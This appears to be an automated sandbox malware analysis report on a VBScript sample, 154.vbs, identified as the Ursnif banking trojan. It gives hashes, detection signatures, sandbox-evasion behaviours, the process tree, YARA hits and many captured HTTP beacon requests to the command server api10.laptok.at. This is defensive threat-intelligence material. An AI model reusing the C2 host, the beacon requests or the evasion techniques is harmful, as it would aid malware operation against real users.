Loading ...

Play interactive tourEdit tour

Analysis Report 154.vbs

Overview

General Information

Sample Name:154.vbs
Analysis ID:287107
MD5:3acdc4ce2667c82ec38259a292da9c9a
SHA1:ccf456b6823ca7374e9dedaf6fe574de860bcbe4
SHA256:c637b67ae008019f3fbe71cb7c5891a8e73d08f4d0cdd927bb43bc499edfb410

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5968 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\154.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 1316 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4636 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1316 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5708 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1988 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3928 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3928 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5484 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5564 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5484 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\fuss.eggAvira: detection malicious, Label: TR/AD.UrsnifDropper.W
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\fuss.eggReversingLabs: Detection: 10%
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/0xZlfmW6cV9Vk/fFwZ7Kz9/wHutdaz7feZ6a2O45wvtH8o/spqIYIF8qV/QbRR0Z7x14QsFqKx7/oLTPzxJJdDtY/_2BGXdVKQb1/wjlMLDn77Bmedx/VZhPgfAnxBSOnDg07VSa2/FfUmCs6vziRfOnK7/Ks5N924_2FRmEZu/2ql2xapKoX2EpbZw_2/B07evxreM/4IJW8LwKRd1Z79Yvky0e/6kNhDSX93DCbvaKEapm/0_2BWcGyg8AYvnliTZSleY/DKUaWREUEN_2B/K_0A_0DH/oijORM0UO_2B2KJOwPO4lsc/gJWphmKOTK/QL2ngugBbNrDBi8pA/nVQ9mrHR/DI0R8BsyOE/_2B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/yuZJfK0Ie/v_2FIITzhv9QYCD3fucs/qLa_2FhUQsy1fMaQBX2/HXVJHH_2FNWbrvKBLGJBWO/EMk4EmX0wL_2B/5xfiR_2B/VgM1Jwkhrgv7i3d9G6xDTx6/66HVPF3rGF/XJRkjPCWwE1kwW03O/JkcIl_2BaRWJ/z1wvnTd_2Fz/tBgxgS3hIiHoHY/KVnBXQUevYvapFFJHBhxZ/Xlcs9HA2A9i2bCtM/SIcK7BjOxjDT6VL/OcNkfa9fKsJqGceMor/xCtcEgZXD/jJ9PzNn3U_0A_0D2TtRB/sF0xUdPe2sbQNSNV08S/KH1_2FUYb4UeYhhyVNCTrr/YCKd13PEC5V0T/2cGDyw_2FO/H2i HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/RC1zB15OsARXE/ls8klnva/52RGO_2BorxAsbjbNAmgJiL/uMphy8DyI_/2BUJaGUCstrBoVheZ/BZ6vV2HV7_2F/lySifzpCqOy/G65726xIMt_2BI/CYBi_2FQZ1mlgt4MxIf4s/qOxG9Qryt0yKa5AM/RiL2BWweZdudbeC/C6FbRvHJo6f4BRdFJo/4JvzDUXxM/VCu_2FX15SQxcOsJt8pE/bx1bG3U3Jg55EmxR9Fo/cDpHSgawLtgWG6OVBlkFu6/guuD0S3xkXkys/6V4_0A_0/DcfcVoYKaVTl2pO6KxRw_2B/_2ByPHuqa9/w2jF_2FPIc590DAiy/Q8VyNrDHhtlb/depwCf1VfIyk/c HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/2_2FipkhkAv63cFsoR8Y/97uT0q3RL040aZKGP8H/J63beTphHVvsG6qkGHf1sK/wfY_2FdYR4tB7/JieUI8pa/evqts7KLcA9nCCpxGIbRELE/oRd7XAh_2F/it13OZebsWTJ6jgI3/0RY_2Bh82fxx/ZJQN0PODx2F/a9M3VmNaWOS5fz/ujPCsgrE_2BevDBZSONFT/1JH_2BzQo_2FL5nh/qx3jE5wIga21ZtE/sueZmTvT523Em_2Bac/AoM6N2_2B/76YM_2F09IU0kLyXoJ_2/Fy8JMW_0A_0DULMq_2B/Ag1ogKaCdZmbJOwWqL6U6Q/CU7we1_2F4iP_/2Fww2PAN/l8WiX4z3bBY8AuukwKfIbIg/v HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/h8JT6RoG4H8Ji_/2B0zjT7aAegAN8tNmsKyC/pVZF0c3y8p8zH9Uj/HveSP26jxKIwH4k/36qnk0MiZPM_2BYHty/SJ2LFyXex/Q3YjSs_2BCCwYtN3VnVv/smJoiEZpCqD82lBZQdT/inqd2Zk7IEfL7T7Fv4atWP/CoufNvwS1QYOe/QxPrI9cU/ogMwqCWpf8u2iHD_2F5YQ1Y/UJHlRzpIs3/UeRIYwcrKC1FwB0hI/Eled60DTLXEc/8P0GQnNeT0Y/JFy2zCEdnlTV_0/A_0DE2VEVb1ZPNUJGw0L8/_2FfZs9dPng4Gykt/mB4qfmK8q2aDDAI/CB_2FWifrohTffT0U0/IsH1Gs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/zoZmtAMMuNAwqqVt5/4hckmAE_2BgZ/ItFInrWpulo/GaZmWNgxU0qj7b/k_2BRbnQjcg1AAvl1QUEn/TLHsOPE1gZXaRuRg/dhjHQITK26h_2B3/hex0iAghWjmny_2BLu/_2Bfiel4O/NzMcqSZ0wg2pahisClSx/_2F8nlo0pNhQxfXqTSR/b16r_2F6p5kQr9zg2eOslk/g2XymlCyNdO8L/ZNLxcI4Y/nBdH2j5HhDHrZ_2FB2WqeSx/VlFbvy_2F_/2B6_2BQSV8ccfS6j_/2BH8Ek1yvCs_/0A_0DkiFUhT/VsIpy2A6DY6eYV/FiQvZYnb_2FJxy1oBxXsb/d7sx1UpgVqADQPCV/UKYHv_2FGSXGb/kn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/d3f1UsX1l2fjz/K3BjC5wj/j4m87_2BYHDmTEI2A2dg0GG/ph3xeLgzqN/7_2FCvNokZ7WbRXZ3/vKhAzWyfCQLt/0OqK_2BRnH0/QTQlL0WEmj5bA6/Et9W0os6OoR_2FMNacRkb/KbKToEBc4WUWolqs/E44e4_2F7XmstQ2/lMA_2FEw0RF41B0Nv0/kYoi0owMr/1b6N4XWv9wd5MojDSOQG/pzDpJ106KpTgQWJEXFQ/0jdOVbIo4Li5Cnqn0sMVTT/wxyLLDrSrEcli/WeK_0A_0/DNMyRaVGATDwNryVcPqfyyF/JUoZGJYfR5/mhm007bj0R6dJ2pWe/OW2DS8IonnIh_2BOO/Y6i1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/ml2ttRqfnVN5/y2FeSqLZj3K/5NZ9uKq53Tu4_2/F3O71PR_2BMPsoct1YE6T/9evvFzxKxluN0Onz/vw_2BVWTg7PHeD_/2FvRLSU7jYpBfbyMPh/HcnOY_2FM/xirEaW2sUO1IxjtXNv1h/WcPLA5If_2BsYvfLX_2/FDY_2BJyb_2B6JQm0DPwEP/cWwuO_2BJkqzo/1aROWNxI/KpeNwWFu1vn4QosxlpkspF1/3bab_2BZGU/htn4lwIKyXEGN0_2F/fBI7HRXC16NP/oTvXqtzXByM/3lGqn_0A_0DDF0/ppjLwZ4JzfU4y6Z8jtFpC/hjZe1oL_2B9p_2Br/K_2FQ1emnL5FWIU/ReETcTXL3U9WoTQ/bK0B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/Gog9o0etDJKBWZgBgM8H7/xQjdolwb1rK4lDDT/eAYB1ZF_2FiQd_2/FaIMprckXozdTCVf3Q/jTdJCam2x/brVhIVzPm36_2BwxIDZc/M15DwWNqdHj_2FDhLla/QiR6_2F_2FmTgEsJiRh3Vy/AJ8rTGLmdE85_/2Bu74312/0NQTC831Sh_2FWFeJNlvIde/urCHHVbvoE/cFxbraI_2BHetDYHK/nMsrXUpM1UKv/z6sgriePsp0/fbGJjPyKwgomyq/ivb_2BiCKRSo5IwZj1nT1/ZSD_0A_0Db3s0TSi/Qg_2FMRJZ9U6Hd3/Bd_2F8MPsJuhEXUZDN/Jtiqx_2F0/mjhBOzlaZF4n_2FZHl7s/_2Bffk2j/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/i07M0NkA_2B_2BcWf/P_2FRuTtHubJ/TXIMW44DaAM/MSH3Ef1IfmtHT7/VFpQkK99bBWxxI8L3ewC_/2FZr34iK6fxXjrLR/IuZBdFmi_2BaWsW/VTRbCI94_2FG4fj2_2/BBlMo6_2B/lUw7vpCRVCXHY82YyUIg/L2mrFPuHoHCNzPJpi2O/Or3L3_2ByrSs3V2aXcQ1Mr/fy_2BXUn2IBpG/lR9PX8eM/bJVuHgQ1Tgc3USVOsNPxcBV/kPhJBDOgb_/2BowznRI492th2f_2/BagNf8JFJtH_/0A_0DpbnOa2/IP8lnAAuHoCtBH/AHrgPzTNgLcQfz2_2BfOg/OvnlEm1p9MnoSNgy/ZdLVccjONxv/g1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/Syz3IE7AIN7liwTn9o3Z5j/ECr4xMOf0OttY/hl5eHgOb/QXedvNmFxrl9GHO0vCfwJ5I/9imGPsUVUl/XHevHIoy3ifRr0T6W/qJ_2FrteFqCI/6KwoO0m5PvT/5VcK4ohdt8meIl/lo7a9W3yDkvGq0gIdwYFp/oYT9oUYKfY1rZYiW/bZZbJZJJ5_2FXlR/k6yVMwD_2FYgiuT_2F/qbKsc91K4/KUMN8H6FKrTTuYbxbhQC/nGxF6zRR7fQQncDrLGB/ocToK6ZAyJDT_0A_0DIh3R/Y2JR_2FME8QPW/wA_2Bqbs/A5IYH_2Fo7Bu9fS3b6LW_2F/8ocm2Wk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/8HFZCaYIQSfOQMAc/li4CcrRPnEMxs_2/BBUQJJnuEgvFS_2BBr/K7hVeiMRF/0q29YQOtpap5ol5rdLdV/D3sxyEJFPY5vepGB1rm/Ufm144sUva8iKZPuSztHFa/lSqhFKL4mAJK1/fOamWF_2/BqBNF1qSUSMQMyBDXq6ngHy/8tbTzD13Qg/9w1uJPK69yjSdN1Ad/iVyBsmE74BxJ/_2Fda_2F06Z/GYjzTpz2OOuLcL/ungOdorTuM0d_2BkhcJvt/ua8rg5xKzErF7TL5/_0A_0D4K2EGp7KB/Mjo_2Feuz9edAv2J_2/B_2BcB8pu/rDajGd7_2FA6FjiDXMOs/GgfMWNJ3hijiVmC/m7P5P HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/6R8OEWxSMbcot3IBWD/54YUZkggJ/e9LB27gyaa_2BukKd6B0/iG2EV2IwL_2B_2BP1up/BRrc2mKi3d_2BjCfbmyaDV/HKtefYv4vC91t/1B38iXhy/8YDEikWA_2BBh36WON_2FCT/JbudynJCwh/OZeoCQjhSbr_2B3P7/H_2FxOL3Pk6u/R8YDmzxLUe_/2BR1ed2zkp9w91/vwehzYeD9CE_2F_2FZCuo/rXRP5mXV3YuAI8Np/wLtgRChYPOby6Jz/JvAwhFwClYIqlnt7Lh/AzqNHeqK_/0A_0Dz1C6P2D3NCAQS96/soGwrIFAYGKtIa4PUxl/gOcmaE6q44CaQAcYJlOztW/voFIrFlbC/xQd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/JnAek_2B1kN/NHwC_2FsnbPhDs/BYpFY11CO8DA0rcW_2FSU/usKLEAU6NfZeLIQr/PAwnDOPuqJI3whZ/3V3uldaEpPKPV9FwfG/MeNVRFTDp/w5LwQ7N44G8Id194baWR/v3c_2Bu3eC_2BF3nu_2/BDFcUhNGhFbIofikKjN48b/vW31oursH6DYJ/qEzljcq_/2BzJl3FYqhEdjUtD9pG2ri8/5c7woQLVRf/fiKt_2ByMTC4PAWAA/_2FE3V5ijUDm/FPZOFxEYzOe/jx5wFySOek8_0A/_0D5I3IIRoA9joYgSJNfy/ASgTyxRbg1TpKDs6/s6dnN8J_/2FYwsas HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/5PMlR6UIIPNtbBX0fiqDaH/tjmSdTnSnzj_2/F2i81q_2/F7R4ZFXpTYzW88kp734mWVS/4q5Rp2A3hB/gl8IDOxTHTXJsK0y_/2B68cuVdMexd/H01MjT1m5uV/uODugRRqHt_2BQ/72MA2lmq3OfB0Z9sXnTe9/GmL3YA9V6GlInJok/NTHL_2FzNOnl7v4/zalBTvWAa3tS0T86cH/fDDtAcGRP/Xi4v5zPhHFkv1JrYZ76q/3XxbEfbHUKiqfMRZgDT/14P0gCYwTPiVUH_0A_0D2b/rZr6pjNynFv2n/SHwQ1t0Y/tWMoUHShrItiwaY_2BFoE0I/XFBS9nAdHC/b58_2FY5K/jS9Sh4q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/zi9vP7ETtrOzEyy9Mvt4T/igz8qGjKdczB20Aq/QHxsJCe9YoeY3s9/1E_2F2aRDRSZ_2F0eH/zoXNMbEEV/l9E2ICCh3nRaytjWrnvX/Ee9OI1GX1qd9CTgTWFC/8fn_2Fihe2YlnLQfeMrVnm/kHDWTqI0Ah6Jv/nFu7QMcr/5hLBEwTZJRUkrXDxp7lNUgQ/AAnNggPbE1/wVckJyiJhH0Ba3qoy/NoYuEfRoYN5K/xRW4yUmlYji/a_2BaWaePyCESw/qmtharrL_2BrvR_0A_0DG/ZPRS4Pt0_2FmnRs6/Or6Kfcrt142k4av/VqnEouM6BxnYB8R_2F/GS346MfY9/XdSeOxAN6/30xx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/v5oW0sp_2FBnAPFAssXEcQD/iHrdzu4fdH/uGW_2FfBnGLCeMriY/ZkEwiYnV_2BD/j040UqfyhNC/e4_2BGt1X8jzYo/Teg2iaFXaKdTAEkrFiCk_/2FQ1kERrDCWwekxZ/zUJQ5iDuqMK7Cnd/nRrzLu23Ar8blApcrA/B91OOro5i/5iWaJo5Gwqpe0LHhyBhq/1NaDIBKntrV6OHxuH9L/rBrNjwuc4QNPtcCOX8Fgem/bGg16uix2ktd7/O2DIBQS2/sE6HzaZXP9jF5b_0A_0D7Q6/y6gSzEmzLh/X9JLOQ6T0JwLi9vr4/2eBzJirJriMy/aQL7sLwOULg/6ABJDzF96/Sa_2BS_2F/h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/pENSOa1zr8L5yvom3f6K/mzOTVc1oQE4R6QHhxIt/ewIWEPa2gC4xDXDJ_2F_2B/j1_2Fo_2B44Uk/PxQo_2F1/QS2Hjf_2FU646KmMhshqjDd/QTP1gruhiR/1whvUcEwIzJgAJ4Ph/1HSUFLSRx8Kf/Acc1b_2BwD2/BNOHdicgSuwyZI/1mXLjVOvMhEOGRQn1UNqO/IWuIDBEEVBzhyfWC/bzanWGCpoM1UrSJ/rj3mhc4SdyzJcqzTxX/8_2Fsq4XY/Wwjly3pgtWmIgzXZlnVv/_0A_0DcZt9QsLC7RlC1/DX_2Bs49r_2B2HTjwXoktc/_2B4QPfmYBJBI/Mi3PaLCU/UgTfi_2FU8X/Vbjyhd1V/Y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: global trafficHTTP traffic detected: GET /api1/OdpCYmmly/lBoWSnGPsA5Nxb_2FmMm/MiC8U05Z0FfgZ6xtJEQ/eJkc6bf_2Fn8bYr_2Fxn3Z/4qdEVZjt8IqdI/XewBvNOD/lfTMj_2BHsxkBunVRBVrvEp/MyO70kEQn3/JRXt9H_2BkBSAp0F1/dbwogfDqzt4V/9zFPAi3xblv/iqVCjsvNuaJOMh/G9OabxleGQ61l4L_2Bemk/pXlkTVhs_2FMR5Zs/7FqSVvJLFOoIOVs/wUi3blIYsrSZKj2t1Q/pl1C_2BD8/5kOfdOnFP3x_0A_0DIZh/nXmAVBwSXzVqqz292pG/wyB9FgrrSu34LrY5_2FHW3/PpIZiDltEV_2F/sqffQZ7T2hte/Cum HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0Host: api10.laptok.at
            Source: msapplication.xml1.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xea057321,0x01d68d62</date><accdate>0xea057321,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xea057321,0x01d68d62</date><accdate>0xea057321,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xea07d54d,0x01d68d62</date><accdate>0xea07d54d,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xea07d54d,0x01d68d62</date><accdate>0xea07d54d,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xea0a379a,0x01d68d62</date><accdate>0xea0a379a,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.12.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xea0a379a,0x01d68d62</date><accdate>0xea0a379a,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 17 Sep 2020 17:24:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {13FA4A41-F956-11EA-90E2-ECF4BB862DED}.dat.12.drString found in binary or memory: http://api10.laptok.at/api1/0xZlfmW6cV9Vk/fFwZ7Kz9/wHutdaz7feZ6a2O45wvtH8o/spqIYIF8qV/QbRR0Z7x14QsFq
            Source: {4AD0B2C2-F956-11EA-90E2-ECF4BB862DED}.dat.20.drString found in binary or memory: http://api10.laptok.at/api1/2_2FipkhkAv63cFsoR8Y/97uT0q3RL040aZKGP8H/J63beTphHVvsG6qkGHf1sK/wfY_2FdY
            Source: {3C90EB31-F956-11EA-90E2-ECF4BB862DED}.dat.18.dr, ~DF077DF68F17F4A3C0.TMP.18.drString found in binary or memory: http://api10.laptok.at/api1/RC1zB15OsARXE/ls8klnva/52RGO_2BorxAsbjbNAmgJiL/uMphy8DyI_/2BUJaGUCstrBoV
            Source: {2E55E87C-F956-11EA-90E2-ECF4BB862DED}.dat.16.drString found in binary or memory: http://api10.laptok.at/api1/yuZJfK0Ie/v_2FIITzhv9QYCD3fucs/qLa_2FhUQsy1fMaQBX2/HXVJHH_2FNWbrvKBLGJBW
            Source: msapplication.xml.12.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.12.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.12.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.12.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.12.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.12.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.12.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.12.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
